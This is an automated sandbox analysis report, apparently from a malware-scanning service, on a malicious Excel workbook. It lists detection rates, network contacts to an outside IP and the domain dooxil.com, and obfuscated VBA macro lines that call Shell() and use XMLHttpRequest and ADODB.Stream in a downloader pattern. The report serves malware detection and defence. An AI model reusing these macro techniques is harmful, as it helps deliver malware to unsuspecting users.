Source: xls.xls |
ReversingLabs: Detection: 17% |
Source: xls.xls |
Virustotal: Detection: 39% |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: global traffic |
TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49171 |
Source: global traffic |
DNS query: name: dooxil.com |
Source: unknown |
DNS traffic detected: queries for: dooxil.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49176 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49175 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49174 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49173 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49172 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49171 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49172 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49175 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49171 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49176 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49173 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49174 -> 443 |
Source: xls.xls |
Stream path '_VBA_PROJECT_CUR/VBA/Foglio1' : found possibly 'ADODB.Stream' functions open, read, write |
Source: xls.xls |
OLE, VBA macro line: riporti = trattasse(scoperte, Shell(riporti)) |
Source: xls.xls |
OLE, VBA macro line: scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4)) |
Source: VBA code instrumentation |
OLE, VBA macro: Module Foglio1, Function dimostrargli, String environ: scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4)) |
Name: dimostrargli |
Source: xls.xls |
Stream path '_VBA_PROJECT_CUR/VBA/Foglio1' : found possibly 'XMLHttpRequest' functions response, responsetext, open, send |
Source: VBA code instrumentation |
OLE, VBA macro: Module Foglio1, Function stupidaggine, found possibly 'XMLHttpRequest' functions response, responsetext, open, send |
Name: stupidaggine |
Source: xls.xls |
OLE indicator, VBA macros: true |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVR622B.tmp |
Source: xls.xls |
OLE indicator, Workbook stream: true |
Source: classification engine |
Classification label: mal68.expl.winXLS@1/0@1/1 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |